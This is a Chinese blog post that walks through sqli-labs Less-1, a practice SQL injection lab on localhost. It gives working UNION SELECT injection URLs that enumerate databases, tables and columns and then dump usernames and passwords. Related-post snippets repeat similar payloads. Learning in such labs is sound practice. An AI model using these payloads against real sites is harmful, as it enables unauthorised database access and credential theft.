sqli-labs>>Less-1

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量223 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645530/article/details/104932677
版权

准备最近刷一下sqli-labs,也是一个边学习边实践的过程,希望自己可以坚持下去吧。
在这里先推荐一下用HackBar这个浏览器插件(FireFox/Chrome),怎么破解百度一下就成,我也不多说了,下面步入正题:
在这里插入图片描述

  1. 我们先输入http://localhost/sqli-labs-master/Less-1/?id=1测试一下,没有问题
    在这里插入图片描述

  2. http://localhost/sqli-labs-master/Less-1/?id=1’ 在输入id=1’测试就会发现报错,说
    你的SQL衣语法有错,我们就可以知道是存在漏洞的。在这里插入图片描述

  3. 下来查询数据库有多少列http://localhost/sqli-labs-master/Less-1/?id=1' order by 3,正常。
    在这里插入图片描述

  4. http://localhost/sqli-labs-master/Less-1/?id=1' order by 4报错,我们便能知道总共3列.
    在这里插入图片描述

  5. 下来查看哪些数据可以回显,我们下来选择在3的位置显示信息。
    在这里插入图片描述

  6. 查看所有的数据库http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+(当前数据库为security)
    在这里插入图片描述

  7. 查看所有的表http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

    我们建议‘security’用十六进制表示,不存在引号问题。在这里插入图片描述

  8. 然后查看列的信息http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
    在这里插入图片描述

  9. 最后我们直接得到账号和密码信息http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username) ,group_concat(password ) from users --+
    在这里插入图片描述

至此,我们就算进行了一次成功的sql注入。

YOUNGBC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqlilabs-Less-1
Dreamsi_zhang的博客
04-18 342
已根据提示访问主页并且携带ID号信息进行提交,得出如上图所示界面。http://192.168.85.140/sqlilabs/Less-1/index.php?id=1 1、判断注入点 执行中可以看出,是通过get方式提交的参数,可以选择在url栏目中添加注入判断语句进行探测, 输入 id=1 and 1=1 ...
sqli-labs教程——Less 1-10
Lilin's博客
12-10 609
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sqli-labs less1(步入网安第一关)
qq_45106794的博客
10-16 511
#sqli-labs less1 ———————————————— ##重要函数和sql语句 使用group_concat() 函数可以让查询获得的数据组成一行显示 例子: select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA count()函数用于统计个数(类似于表的个数,数据库的个数等等) 例子: select c...
Sqli-labs Less-1 题解
Zhuoqian_1的博客
03-11 322
最近学习了SQL注入,找了Sqli-labs来练习一下。 Less-1 原页面: 1、题目中参数为id,尝试?id=1 2、尝试单引号注入?id=1' 发现单引号没有被过滤 这个提示为 ''1'' LIMIT 0,1' 注意这个地方是这样看的(按上述颜色,黄色的引号不是数据库查询里的,第一次没看懂QAQ) 3、尝试?id=1' # 这里有个坑,输入#不是把之后注释掉,要用%23 ,目前不知道原因,应该是版本问题。 ?id=1' %23 4、使用union s...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 12万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs less-01
weixin_47075747的博客
12-12 503
Sqli-labs less-01 mysql 基本用法 查库:select schema_name from information_schema.schemata; 查表:select table_name from information_schema.tables where table_schema='security';
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 951
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs Less8
orchid_sea的博客
10-16 987
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
SQLI-LABS Less-7 到 Less-8
Web学习之路
03-20 248
布尔盲注
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
node-v4.8.6-win-x64.zip
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基础运维技能(下)md格式笔记
最新发布
05-07
基础运维技能(下)md格式笔记
node-v8.1.2-linux-armv7l.tar.xz
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
黑马程序员 C语言学习笔记
05-07
持续更新
PCL-1.14.1-AllInOne-msvc2022-win64+pdb-msvc2022-win64
05-07
PCL-1.14.1-AllInOne-msvc2022-win64+pdb-msvc2022-win64
sqli-labs-less
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值